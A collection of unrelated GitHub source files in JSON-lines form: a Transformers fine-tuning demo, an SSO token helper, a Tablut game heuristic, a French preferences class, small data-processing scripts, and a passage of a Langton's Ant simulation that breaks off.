evaluation_strategy和eval_steps每50个训练step在验证集上验证训练模型。\n# logging_strategy 和 logging_steps 每 50 个训练step保存日志(将由 TensorBoard 可视化)。\n# save_strategy 和 save_steps 表示每 200 个训练step保存训练模型。\n# learning_rate 学习率。per_device_train_batch_size 和 per_device_eval_batch_size 分别表示在训练和验证期间使用的批大小。\n# num_train_epochs表示训练的轮次数。\n# load_best_model_at_end 表示在测试集上计算使用性能最好的模型(用 metric_for_best_model 指定)的模型。\n# report_to 将所有训练和验证的数据报告给 TensorBoard。\n\n\nargs = TrainingArguments(\n # output_dir: directory where the model checkpoints will be saved.\n output_dir=model_output_dir,\n # evaluation_strategy (default \"no\"):\n # Possible values are:\n # \"no\": No evaluation is done during training.\n # \"steps\": Evaluation is done (and logged) every eval_steps.\n # \"epoch\": Evaluation is done at the end of each epoch.\n evaluation_strategy=\"steps\",\n # eval_steps: Number of update steps between two evaluations if\n # evaluation_strategy=\"steps\". Will default to the same value as\n # logging_steps if not set.\n eval_steps=50,\n # logging_strategy (default: \"steps\"): The logging strategy to adopt during\n # training (used to log training loss for example). Possible values are:\n # \"no\": No logging is done during training.\n # \"epoch\": Logging is done at the end of each epoch.\n # \"steps\": Logging is done every logging_steps.\n logging_strategy=\"steps\",\n # logging_steps (default 500): Number of update steps between two logs if\n # logging_strategy=\"steps\".\n logging_steps=50,\n # save_strategy (default \"steps\"):\n # The checkpoint save strategy to adopt during training. Possible values are:\n # \"no\": No save is done during training.\n # \"epoch\": Save is done at the end of each epoch.\n # \"steps\": Save is done every save_steps (default 500).\n save_strategy=\"steps\",\n # save_steps (default: 500): Number of updates steps before two checkpoint\n # saves if save_strategy=\"steps\".\n save_steps=200,\n # learning_rate (default 5e-5): The initial learning rate for AdamW optimizer.\n # Adam algorithm with weight decay fix as introduced in the paper\n # Decoupled Weight Decay Regularization.\n learning_rate=2e-5,\n # per_device_train_batch_size: The batch size per GPU/TPU core/CPU for training.\n per_device_train_batch_size=16,\n # per_device_eval_batch_size: The batch size per GPU/TPU core/CPU for evaluation.\n per_device_eval_batch_size=16,\n # num_train_epochs (default 3.0): Total number of training epochs to perform\n # (if not an integer, will perform the decimal part percents of the last epoch\n # before stopping training).\n num_train_epochs=1,\n # load_best_model_at_end (default False): Whether or not to load the best model\n # found during training at the end of training.\n load_best_model_at_end=True,\n # metric_for_best_model:\n # Use in conjunction with load_best_model_at_end to specify the metric to use\n # to compare two different models. Must be the name of a metric returned by\n # the evaluation with or without the prefix \"eval_\".\n metric_for_best_model=\"accuracy\",\n # report_to:\n # The list of integrations to report the results and logs to. Supported\n # platforms are \"azure_ml\", \"comet_ml\", \"mlflow\", \"tensorboard\" and \"wandb\".\n # Use \"all\" to report to all integrations installed, \"none\" for no integrations.\n report_to=\"tensorboard\"\n)\n\n# 然后需要将这些训练参数传递给 Trainer 对象, Trainer 对象被实例化就可以使用 train 方法开始训练。\n\n# Function that returns an untrained model to be trained\ndef model_init():\n return AutoModelForSequenceClassification.from_pretrained(model_checkpoint,\n num_labels=2)\n\n# Function that will be called at the end of each evaluation phase on the whole\n# arrays of predictions/labels to produce metrics.\ndef compute_metrics(eval_pred):\n # Predictions and labels are grouped in a namedtuple called EvalPrediction\n predictions, labels = eval_pred\n # Get the index with the highest prediction score (i.e. the predicted labels)\n predictions = np.argmax(predictions, axis=1)\n # Compare the predicted labels with the reference labels\n results = metric.compute(predictions=predictions, references=labels)\n # results: a dictionary with string keys (the name of the metric) and float\n # values (i.e. the metric values)\n return results\n\n# Since PyTorch does not provide a training loop, the 🤗 Transformers library\n# provides a Trainer API that is optimized for 🤗 Transformers models, with a\n# wide range of training options and with built-in features like logging,\n# gradient accumulation, and mixed precision.\ntrainer = Trainer(\n # Function that returns the model to train. It's useful to use a function\n # instead of directly the model to make sure that we are always training\n # an untrained model from scratch.\n model_init=model_init,\n # The training arguments.\n args=args,\n # The training dataset.\n train_dataset=splitted_datasets_encoded[\"train\"],\n # The evaluation dataset. We use a small subset of the validation set\n # composed of 150 samples to speed up computations...\n eval_dataset=splitted_datasets_encoded[\"test\"].shuffle(42).select(range(150)),\n # Even though the training set and evaluation set are already tokenized, the\n # tokenizer is needed to pad the \"input_ids\" and \"attention_mask\" tensors\n # to the length managed by the model. It does so one batch at a time, to\n # use less memory as possible.\n tokenizer=tokenizer,\n # Function that will be called at the end of each evaluation phase on the whole\n # arrays of predictions/labels to produce metrics.\n compute_metrics=compute_metrics\n)\n\n# ... train the model!\ntrainer.train()\n\n# 在训练过程中,可以刷新 TensorBoard 来查看训练指标的更新。在本文中,只看到训练集上的损失、验证集上的损失和验证集上的准确率。\n\nimport numpy as np\n\n# Tokenize test set\ndataset_test_encoded = dataset[\"test\"].map(preprocess_function_batch, batched=True)\n# Use the model to get predictions\ntest_predictions = trainer.predict(dataset_test_encoded)\n# For each prediction, create the label with argmax\ntest_predictions_argmax = np.argmax(test_predictions[0], axis=1)\n# Retrieve reference labels from test set\ntest_references = np.array(dataset[\"test\"][\"label\"])\n# Compute accuracy\nmetric.compute(predictions=test_predictions_argmax, references=test_references)\n# {'accuracy': 0.91888}\n\n\n","repo_name":"liguodongiot/nlp-app-samples","sub_path":"tests/transformer/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":12925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13005914557","text":"# -*- coding: UTF-8 -*-\nimport requests\n\n\ndef get_token(name, pw):\n url = \"http://test.api.sso.skytech.cn/login\"\n data = {\n 'name': name,\n 'password': pw,\n 'token': True,\n }\n headers = {\n 'Connection': 'keep-alive',\n 'Accept': '*/*',\n 'Content-Type': \"application/json\",\n 'Accept-Encoding': 'gzip, deflate, br',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n }\n response = requests.request(\"POST\", url, json=data, headers=headers)\n if response.status_code == 200 and response.json()['desc'] == \"success\":\n user_token = response.json()['token']\n return user_token\n return print(response.status_code)\n","repo_name":"Gideon0314/web_test","sub_path":"tools/get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30930977078","text":"# The engine represents the game algorithm. It is responsible for computing the game tree using the minimax algorithm.\n# After the game tree is computed, the engine will return it to pruning.py to be pruned using alpha-beta pruning.\nimport numpy as np\n\nimport Board\n\n\n# Define the heuristic function\ndef heuristic(board, score):\n # the move score is the sum of all the singular scores based on the board state\n move_score = score\n # check if the KING is surrounded by the opponent's pieces (not captured)\n if board.isKingSurrounded():\n move_score += 75*board.nEnemiesCloseToKing()\n # check if the KING is near the throne in the middle of the board\n if board.isKingNearThrone():\n move_score -= 10\n # check if the KING is at the edge of the board (WHITE wins)\n if board.isKingAtEdge():\n move_score -= 10000\n # check if the KING is captured (BLACK wins)\n if board.isKingCaptured():\n move_score += 10000\n # check if the WHITE has more pieces than the BLACK\n if board.getWhitePieces() > board.getBlackPieces():\n move_score -= (board.getWhitePieces() - board.getBlackPieces()) * 2 # multiply by 2 because the BLACK has in the\n # beginning of the game double the number of pieces than the WHITE\n # check if the BLACK has more pieces than the WHITE\n if board.getWhitePieces() < board.getBlackPieces():\n move_score += (board.getBlackPieces() - board.getWhitePieces())\n # sum to move score the number of good moves for the BLACK\n move_score += black_good_moves(board)\n # subtract to move score the number of good moves for the WHITE\n move_score -= white_good_moves(board)*2\n return move_score\n\n\ndef black_good_moves(board):\n # return the number of good moves for the BLACK given the board state\n # every black piece gets assigned a weight score, based on board state, for each quadrant\n # [top left, top right, bottom left, bottom right]\n # the weight score is the following:\n # very good move: 1\n # good move: 0.5\n # not so good move: 0.25\n # then sum all the weighted scores and return the sum\n king = board.getKing()\n king_x = king[0][0]\n king_y = king[1][0]\n weight_score = [0.5, 0.5, 0.5, 0.5]\n # if king is in the top left quadrant\n if king_x < board.getCenterCoordinate() and king_y < board.getCenterCoordinate():\n weight_score = [1, 0.5, 0.5, 0.25]\n # if king is in the top right quadrant\n elif king_x < board.getCenterCoordinate() < king_y:\n weight_score = [0.5, 1, 0.25, 0.5]\n # if king is in the bottom left quadrant\n elif king_x > board.getCenterCoordinate() > king_y:\n weight_score = [0.5, 0.25, 1, 0.5]\n # if king is in the bottom right quadrant\n elif king_x > board.getCenterCoordinate() and king_y > board.getCenterCoordinate():\n weight_score = [0.25, 0.5, 0.5, 1]\n # if king is in the top middle\n elif king_x < board.getCenterCoordinate() and king_y == board.getCenterCoordinate():\n weight_score = [1, 1, 0.25, 0.25]\n # if king is in the bottom middle\n elif king_x > board.getCenterCoordinate() and king_y == board.getCenterCoordinate():\n weight_score = [0.25, 0.25, 1, 1]\n # if king is in the left middle\n elif king_x == board.getCenterCoordinate() and king_y < board.getCenterCoordinate():\n weight_score = [1, 0.25, 1, 0.25]\n # if king is in the right middle\n elif king_x == board.getCenterCoordinate() and king_y > board.getCenterCoordinate():\n weight_score = [0.25, 1, 0.25, 1]\n # if king is in the center\n else:\n weight_score = [0.5, 0.5, 0.5, 0.5]\n # get the black pieces for each quadrant\n black_pieces = np.where(board.getBoard() == 2)\n black_pieces_x = black_pieces[0]\n black_pieces_y = black_pieces[1]\n tmp = black_pieces_y[black_pieces_x <= board.getCenterCoordinate()]\n top_right_pieces = len(tmp[tmp >= board.getCenterCoordinate()])\n tmp = black_pieces_y[black_pieces_x <= board.getCenterCoordinate()]\n top_left_pieces = len(tmp[tmp <= board.getCenterCoordinate()])\n tmp = black_pieces_y[black_pieces_x >= board.getCenterCoordinate()]\n bottom_right_pieces = len(tmp[tmp >= board.getCenterCoordinate()])\n tmp = black_pieces_y[black_pieces_x >= board.getCenterCoordinate()]\n bottom_left_pieces = len(tmp[tmp <= board.getCenterCoordinate()])\n # multiply the number of black pieces in each quadrant by the weight score\n top_right_score = top_right_pieces * weight_score[0]\n top_left_score = top_left_pieces * weight_score[1]\n bottom_right_score = bottom_right_pieces * weight_score[2]\n bottom_left_score = bottom_left_pieces * weight_score[3]\n # also add for every black piece canBlackEatFrom(x, y)\n eat_score = 0\n for i in range(len(black_pieces_x)):\n if board.canBlackEatFrom(black_pieces_x[i], black_pieces_y[i]):\n eat_score += 1\n # return the sum of all the weighted scores\n return top_right_score + top_left_score + bottom_right_score + bottom_left_score + eat_score*0.5\n\n\ndef white_good_moves(board):\n # return the number of good moves for the WHITE given the board state (see black_good_moves)\n # good moves for white:\n # 1. try to block or eat the black pieces\n # get the white pieces\n white_pieces = np.where(board.getBoard() == 1)\n white_pieces_x = white_pieces[0]\n white_pieces_y = white_pieces[1]\n # for each white piece, check if it can eat or block a black piece\n # if it can, add 1 to the score for kill 0.75 for block\n score = 0\n for i in range(len(white_pieces_x)):\n x = white_pieces_x[i]\n y = white_pieces_y[i]\n # check if the piece can eat a black piece\n if board.canWhiteEatFrom(x, y):\n score += 1\n # check if the piece can block a black piece\n if board.canWhiteBlockFrom(x, y):\n score += 0.75\n return score\n\n\n","repo_name":"CipStr/Tablut-MALI","sub_path":"heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14945496063","text":"# *-* coding:utf-8 *-*\nfrom configparser import *\nimport os\n\nfrom util.widgets.TextWidget import *\nfrom util.util import adaptTextColor, setStyleDay\nfrom affichages.gantt.liens.AbstractLink import *\n\n# Dictionnaires de couleurs\nfrom preferences.themes.themeLoader import WIN_COLORS\nfrom PIL.ImageColor import colormap\n\nclass Data(ConfigParser):\n def __init__(self):\n super().__init__(self)\n # Création des attributs\n self.__profilFolder = None\n self.__palette = {\n \"background\" : \"#dedede\",\n \"foreground\" : \"#000000\",\n \"selected\" : \"#91c9f7\",\n \"jour\" : \"#ffffa0\",\n \"highlightedWidget\" : \"#cccccc\",\n \"normalInnerLink\" : \"#808080\", # (= \"grey\" = \"gray\")\n \"addLink\" : \"#ffaf00\",\n \"deleteLink\" : \"#ff3f3f\"\n }\n\n def endInit(self):\n \"\"\"\n Méthode qui doit être appelé pour finir la construction de l'appli\n \"\"\"\n # Donner une référence à data\n TextWidget.giveData(self)\n AbstractLink.giveData(self)\n\n ## Couleur du jour sélectionné\n if self.testDataExist(\"General\", \"Thème\", \"today's color\"):\n couleur = self.getOneValue(\"General\", \"Thème\", \"today's color\")\n else :\n couleur = self.getPalette()[\"jour\"]\n self.changePalette(\"jour\", couleur)\n # Mettre le style d'affichage des jours\n setStyleDay(self.getStyleDayPrinting())\n\n \"\" # Marque pour le repli\n ################\n # Utilitaire : #\n ################\n \"\"\n def read(self, fichier, add = False):\n \"\"\"\n On efface ce qu'on avait en mémoire\n et on relit tout\n \"\"\"\n if not add:\n self.clear()\n super().read(fichier, encoding=\"utf-8\")\n\n def readFile(self, nom, lireDef = True, lireCfg = True):\n \"\"\"\n Fonction qui va lire les fichiers de préférences avec Data\n @param nom : nom du fichier à lire (sans l'extension)\n \"\"\"\n self.clear()\n if lireDef and lireCfg:\n self.read(\"Ressources/prefs/\"+nom+\".def\")\n path = self.getProfilFolder() + \"/\" + nom + \".cfg\"\n if os.path.exists(path):\n self.read(path, add=True) # Prise de conscience de ce qu'il y a dedans\n\n # On ne met pas le add sinon\n elif not lireDef and lireCfg:\n path = self.getProfilFolder() + \"/\" + nom + \".cfg\"\n if os.path.exists(path):\n self.read(path) # Prise de conscience de ce qu'il y a dedans\n\n elif lireDef and not lireCfg:\n self.read(\"Ressources/prefs/\"+nom+\".def\")\n\n def sauv(self, fichier):\n \"\"\"\n Écrit dans le fichier puis\n @param fichier : contient le path + nom + extension du fichier dans lequel Data doit écrire\n # Note : une lecture de ce fichier est conseillé avant afin de ne pas supprimer tout le contenu inutilement\n \"\"\"\n with open(fichier, \"w\", encoding=\"utf-8\") as tfile:\n self.write(tfile)\n\n \"\"\n #############\n # Testeur : #\n #############\n \"\"\n def testBool(self, value):\n \"\"\" Test pour savoir si value est un Booléen \"\"\"\n if not isinstance(value, bool):\n raise TypeError(\"Expected a boolean\")\n\n def testDataExist(self, nomFichier, nomSection = None, nomCle = None):\n \"\"\"\n Méthode qui True si la valeur existe dans le fichier et la section indiqué\n @param nomFichier : contient le nom du fichier dans lequel se trouve notre valeur\n @param nomSection : contient le nom de la section dans laquelle se trouve notre valeur\n @param nomCle : contient le nom de la clé pour ainsi obtenir la valeur\n @return : True = la clé existe, False = la clé, la section ou le fichier n'existe pas\n \"\"\"\n self.readFile(nomFichier)\n # Le fichier existe ?\n if nomSection is None and nomCle is None:\n return True if self.sections() != [] else False\n # La section du fichier existe ?\n elif nomSection is not None and nomCle is None:\n return True if nomSection in self.sections() else False\n # J'ai mis la clé mais pas la section, c'est grave ? (ERROR)\n elif nomSection is None and nomCle is not None:\n raise ValueError(\"Une clé doit être lié a une section pour être trouvé\")\n # La clé existe dans la section du fichier spécifié ?\n else :\n return True if nomSection in self.sections() and nomCle in self[nomSection] else False\n\n def testString(self, value):\n \"\"\" Test pour savoir si value est un String \"\"\"\n if not isinstance(value, str):\n raise TypeError(\"Expected a string\")\n\n \"\"\n ###########\n # Getters #\n ###########\n \"\"\n def getOneValue(self, nomFichier, nomSection, nomCle):\n \"\"\"\n Méthode qui renvoie une valeur précise\n @param nomFichier : contient le nom du fichier dans lequel se trouve notre valeur\n @param nomSection : contient le nom de la section dans laquelle se trouve notre valeur\n @param nomCle : contient le nom de la clé pour ainsi obtenir la valeur\n @return : la value\n \"\"\"\n if not self.testDataExist(nomFichier, nomSection, nomCle):\n raise ValueError(\"%s n'existe pas dans %s du fichier %s.\\n utiliser la méthode data.testDataExist() pour éviter l'erreur\"%(nomCle, nomSection, nomFichier))\n return self[nomSection][nomCle]\n\n def getPalette(self):\n \"\"\"\n Méthode qui retourne une copie de la palette de couleur\n @return self.__palette.copy()\n \"\"\"\n return self.__palette.copy()\n\n def getProfilFolder(self):\n return self.__profilFolder + \"/\" # au cas où\n\n def getStyleDayPrinting(self):\n \"\"\"\n Getter pour le style d'affichage des jours selon les préférences\n Cette méthode est utilisé par util.util#adaptDate pour rendre toutes les dates jolies\n Utiliser cette méthode permet de passer une seule fois par data, ensuite les valeurs sont stockées dans util\n @return : (, ) : (format de texte, lien)\n \"\"\"\n # Si le fichier n'existe pas :\n if not self.testDataExist(\"Calendrier\"):\n return (\"NA_NM2_NJ\", \".\")\n # On cherche le lien\n if self.testDataExist(\"Calendrier\", \"Calendrier\", \"Lien\"):\n lien = self.getOneValue(\"Calendrier\", \"Calendrier\", \"Lien\")[1]\n else :\n lien = \".\"\n # On cherche le style\n if self.testDataExist(\"Calendrier\", \"Calendrier\", \"sytle d'affichage\"):\n texte = self.getOneValue(\"Calendrier\", \"Calendrier\", \"sytle d'affichage\")\n # On retourne les valeurs :\n return (texte, lien)\n\n\n \"\"\n ###########\n # Setters #\n ###########\n \"\"\n def changePalette(self, cle, value):\n \"\"\"\n Permet de changer une valeur de la palette\n @param cle : contient le nom de la clé\n @param value : couleur au format tkinter\n \"\"\"\n if cle in self.getPalette():\n if value.startswith(\"System\"):\n self.__palette[cle] = WIN_COLORS[value]\n elif value[0] != \"#\":\n self.__palette[cle] = colormap[value.lower()]\n else:\n self.__palette[cle] = value\n else:\n raise ValueError('\"%s\" not in data#__palette')\n def setCurrentTheme(self, style):\n \"\"\"\n Setter pour un nouveau thème et donc change la palette\n @param style : pour récupérer toutes les valeurs adéquates\n \"\"\"\n def couleurAdaptative(native, accentuation, cle):\n \"\"\"\n Fonction embarqué qui permet de mettre une couleur asé sur une autre\n avec une accentuation différence\n @param native : couleur a tester (clair/foncé) et à modifier\n @param accentuation : valeur de l'acctentuation en hexa. exemple : \"121212\"\n @param cle : nom de la clé de la nouvelle couleur\n \"\"\"\n # Si c'est clair\n if adaptTextColor(native) == \"#000000\":\n self.changePalette(cle, \"#\" + hex(int(native[1:], 16) - int(accentuation, 16))[2:])\n # Si c'est foncé\n else :\n self.changePalette(cle, \"#\" + hex(int(native[1:], 16) + int(accentuation, 16))[2:])\n\n # On récupère les valeurs pour les mettre dans le dico __palette\n self.changePalette(\"background\", style.lookup(\".\", \"background\"))\n self.changePalette(\"foreground\", style.lookup(\".\", \"foreground\"))\n if style.lookup(\".\", \"selectbackground\") != \"\":\n self.changePalette(\"selected\", style.lookup(\".\", \"selectbackground\"))\n else: # Aquativo n'a pas de couleur de sélection\n self.changePalette(\"selected\", \"#85cafc\")\n\n # Pour les TextWidget\n couleurAdaptative(self.getPalette()[\"background\"], \"121212\", \"highlightedWidget\")\n # Pour les liens\n couleurAdaptative(self.getPalette()[\"background\"], \"555555\", \"normalInnerLink\")\n\n return\n\n def setProfilFolder(self, value):\n \"\"\"\n Setter du path du profil en cours\n @param value : contient le path\n \"\"\"\n self.testString(value)\n self.__profilFolder = value + \"/\" # au cas où\n return\n","repo_name":"Zetrypio/TaskManager","sub_path":"TaskManager/dataManager/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9582,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6664976665","text":"#!/usr/bin/python3\nimport sys\n\n\ndef main():\n acc_size = 0\n acc_mean = 0\n acc_var = 0\n for line in sys.stdin:\n chunk_size, chunk_mean, chunk_var = line.split()\n chunk_size = int(chunk_size)\n chunk_mean = float(chunk_mean)\n chunk_var = float(chunk_var)\n new_size = chunk_size + acc_size\n acc_var = (chunk_size * chunk_var + acc_size * acc_var) / new_size + \\\n chunk_size * acc_size * ((chunk_mean - acc_mean) / new_size) ** 2\n acc_mean = (chunk_size * chunk_mean + acc_size * acc_mean) / new_size\n acc_size += chunk_size\n print(\"{} {} {}\".format(acc_size, acc_mean, acc_var)) \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sesevasa64/BigData","sub_path":"hw1/block2/var_reducer.py","file_name":"var_reducer.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42723299507","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport json\nimport logging\nimport random\n\n\nclass DianpingProPipeline(object):\n def open_spider(self, spider):\n self.file_path = './data/{}.{}'.format(spider.name,random.randint(100,1000))\n self.file = open(self.file_path, \"w\")\n\n def process_item(self, item, spider):\n dictitem = dict(item)\n self.file.write(json.dumps(dictitem, ensure_ascii=False))\n self.file.write('\\n')\n self.file.flush()\n return item\n\n def close_spider(self, spider):\n logging.info('存储数据成功,本地存储路径:{}'.format(self.file_path))\n self.file.close()\n","repo_name":"Pineapple1996/dianping_pro","sub_path":"dianping_pro/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33511206313","text":"# ch4_1.py\nimport cv2\n\nimg = cv2.imread(\"view.jpg\") # BGR 讀取\ncv2.imshow(\"view.jpg\", img)\nimg_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # BGR 轉 RBG\ncv2.imshow(\"RGB Color Space\", img_rgb)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n \n","repo_name":"jumbokh/Computer-Vision","sub_path":"sources/ch4ColorSpace/ch4_1.py","file_name":"ch4_1.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35849967568","text":"print('-' * 25)\r\nprint('Sequência de Fibonacci')\r\nprint('-' * 25)\r\ntermo = int(input('Quantos termos você quer mostrar? '))\r\nt1 = 0\r\nt2 = 1\r\nc = 3\r\nprint(f'{t1} > {t2} >', end=' ')\r\nwhile c <= termo:\r\n t3 = t1 + t2\r\n print(f'{t3} >', end=' ')\r\n t1 = t2\r\n t2 = t3\r\n c += 1\r\nprint('fim')","repo_name":"HebertZanatelli/Python","sub_path":"CursoEmVideo/Exercicios/063.py","file_name":"063.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4743251377","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # write a python program to get the fibonacci series between 0 to 50\n# \n\n# In[3]:\n\n\nstart = int (input(\"enter the starting number for range: \"))\nend = int(input(\"enter the ending number for range: \")) \na = 0\nb = 1\nsum = 0\nprint(\"fibonacci series between\",start, \"to\", end, \"is: \")\nwhile(sum < end):\n a = b\n b = sum\n sum = a + b\n print(b)\nprint(end = \" \") \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Manu31manasa/assignment-1-","sub_path":"Fibnocci series.py","file_name":"Fibnocci series.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37205496187","text":"from collections import Counter\nfrom functools import cached_property\nimport os\nimport sys\nimport pdb\nimport json\nimport random\nfrom typing import List\nimport torch\nimport torch.utils.data as tdata\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom datasets.build import DATASET_REGISTRY, build_dataset\nfrom .prompter.attr import Prompter as Prompter\nfrom models import clipimg_model\n\n\nEXTRA_DIR = {\n # \"CGQA\": \"data/C-GQA\",\n \"VG\": \"data/VG\",\n}\n\n\n\ndef purify_verb(x):\n x = x.strip().lower()\n x = x.replace(\"_\", \" \").replace(\"-\", \" \")\n return x\n\n\n\n@DATASET_REGISTRY.register()\nclass One4AllDataset_Attr(tdata.Dataset):\n def __init__(self, cfg, mode):\n \n self.datasets = {} \n cfg.TRAIN.EXTRA_MASK = \"train:/home/user/lmy/DATA/independent_attr1/train_code/abcd/video_property/One4all_train_100K_sc5.json; val:/home/user/lmy/DATA/independent_attr1/train_code/abcd/video_property/One4all_train_100K_sc5.json\" \n # cfg_TRAIN_EXTRA_MASK = \"train:/home/user/lmy/DATA/independent_attr1/train_code/abcd/configs/One4all_train_10K_sc5.json; val:video_property/ego-o4a/val.json\"\n # train:xxx; val:xxx\n data_mask = cfg.TRAIN.EXTRA_MASK.split(\";\") # cfg.TRAIN.EXTRA_MASK: \"train:xxx; val:xxx\"\n data_mask = [x.split(\":\") for x in data_mask] # data_mask: [[\"train\", \"xxx\"], [\"val\", \"xxx\"]]\n mask_per_ds = {k.strip():v.strip() for k, v in data_mask} # mask_per_ds: {\"train\": \"xxx\", \"val\": \"xxx\"}\n mask_path = mask_per_ds[mode] # mask_path: \"xxx\"\n\n with open(mask_path, \"r\") as fp:\n self.idx_list = json.load(fp) # self.idx_list: [[\"CGQA\", 0], [\"CGQA\": 1], ...] \n\n idx_per_dataset = Counter([k for k, _ in self.idx_list]) # idx_per_dataset: Counter({'CGQA': 5637, 'DTD': 4363})\n # pdb.set_trace()\n\n\n for name in idx_per_dataset.keys():\n \n #cfg.DATA.PATH_TO_DATA_DIR = EXTRA_DIR[name] \n cfg_DATA_PATH_TO_DATA_DIR = EXTRA_DIR[name]\n # pdb.set_trace()\n dset = build_dataset(name, cfg, mode) # dset: EpicDataset \n self.datasets[name] = dset # self.datasets: {\"Epic\": EpicDataset, \"FiftySalads\": FiftySaladsDataset, ...}\n # pdb.set_trace()\n print(f\"One4All {mode}\") # print: \"One4All train\"\n for k, v in idx_per_dataset.items():\n print(f\"\\t{k}: {v}\") # print: \"Epic: 100\", \"FiftySalads: 200\", ...\n \n\n # verb-classes stuff\n self.verb2id_o4a = json.load(open(\"/home/user/lmy/DATA/independent_attr1/train_code/abcd/attr2id_vg.json\")) # self.verb2id_o4a: {\"verb1\": 0, \"verb2\": 1, ...}\n self.prompter = Prompter()\n self.num_class = len(set(self.verb2id_o4a.values()))\n self.verb_str_per_id = [[] for _ in range(self.num_class)] # 这一句代码创建了一个包含 self.num_class 个空列表的列表 self.verb_str_per_id。\n \n for k, i in self.verb2id_o4a.items():\n #pdb.set_trace()\n self.verb_str_per_id[i].append(eval(k)) # 一个编号对应多个动词\n # pdb.set_trace()\n # pdb.set_trace()\n # self.prompter = Prompter()\n\n \n def __len__(self):\n return len(self.idx_list)\n\n def __getitem__(self, index):\n name, idx = self.idx_list[index] # self.idx_list: [[\"CGQA\", 20877], [\"CGQA\": 23], ...]\n dset = self.datasets[name]\n item = dset[idx] # 从子数据集中获取数据,具体参考每个数据集专用的dataset\n verb_id = item[dset.repeat_time] \n try:\n verb_str = dset.attr_list[verb_id]\n except KeyError:\n print(dset.attr_list, verb_id)\n \n #verb_str = purify_verb(verb_str)\n \n item[dset.repeat_time] = self.verb2id_o4a[str(verb_str)] # item\n\n return item\n\n\n\n @cached_property\n def prompt_token_per_class(self) -> List[torch.Tensor]:\n all_prompts = []\n \n for verb_str_list in self.verb_str_per_id:\n prompts = []\n for verb_str in verb_str_list:\n prompts += self.prompter.list_all(verb_str)\n all_prompts.append(prompts)\n\n all_tokens = []\n for prompts in all_prompts:\n all_tokens.append(clipimg_model.tokenize(prompts))\n return all_tokens\n\n\nif __name__ == \"__main__\":\n\n attr_dataset = One4AllDataset_Attr(None, \"train\")\n attr_dataset[1]\n\n","repo_name":"MingyuLau/ATTRCLIP","sub_path":"independent_attr1/train_code/Attr_clip/datasets/One4AllDataset_attr.py","file_name":"One4AllDataset_attr.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23092352055","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLangton's Ant Simulation\n\nCreated on 2021-04-25\n\n@author: Richard Wainwright, 40126812\n\nLangton's Ant is Turing complete because the ant can move back and forth\nand can read and write. Using this behaviour you can set up an initial\nstate for the ant to simulate logic gates and have the ant run any program\nfor you.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\nclass Ant:\n \"\"\"\n Ant object to interact with lattice\n \"\"\"\n def __init__(self, x, y, direction):\n self.direction = direction\n self.x = x\n self.y = y\n\n def turn_right(self):\n self.direction = {\n 'N': 'E',\n 'E': 'S',\n 'S': 'W',\n 'W': 'N'\n }[self.direction]\n\n def turn_left(self):\n self.direction = {\n 'N': 'W',\n 'E': 'N',\n 'S': 'E',\n 'W': 'S'\n }[self.direction]\n\n def move(self):\n if self.direction == 'N':\n self.y += 1\n elif self.direction == 'E':\n self.x += 1\n elif self.direction == 'S':\n self.y -= 1\n else:\n self.x -= 1\n\n\nclass LangAnt:\n \"\"\"\n Object for lattice to demonstrate Langton's Ant\n \"\"\"\n def __init__(self, ant, rules, N=256, finite=False, fastMode=False):\n self.grid = np.zeros((N, N), np.uint)\n self.finite = finite\n self.fastMode = fastMode\n self.N = N\n self.ant = ant\n self.rules = rules\n\n def getGrid(self):\n return self.grid\n\n def step(self):\n \"\"\"\n Have the ant turn and move according to the rules\n \"\"\"\n if self.ant.x < 0 or self.ant.y < 0 or \\\n self.ant.x >= self.N or self.ant.y >= self.N:\n return self.grid\n\n new_grid = self.getGrid()\n\n if self.rules[new_grid[self.ant.x][self.ant.y]] == 'R':\n self.ant.turn_right()\n else:\n self.ant.turn_left()\n\n new_grid[self.ant.x][self.ant.y] = \\\n (new_grid[self.ant.x][self.ant.y] + 1) % len(self.rules)\n\n 